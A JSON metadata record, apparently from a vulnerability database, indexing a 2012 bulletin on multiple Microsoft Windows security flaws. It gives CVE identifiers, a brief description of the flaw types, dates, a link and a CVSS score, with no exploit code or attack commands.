[{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-0175", "CVE-2012-1891", "CVE-2012-1890", "CVE-2012-1889", "CVE-2012-1893", "CVE-2012-1870"], "description": "Microsoft XML Services memory corruption, ADO memory corruption, kernel drivers vulnerabilities, Window Shell command injection, TLS vulnerabilities", "edition": 1, "modified": "2012-08-26T00:00:00", "published": "2012-08-26T00:00:00", "id": 
"SECURITYVULNS:VULN:12464", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12464", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}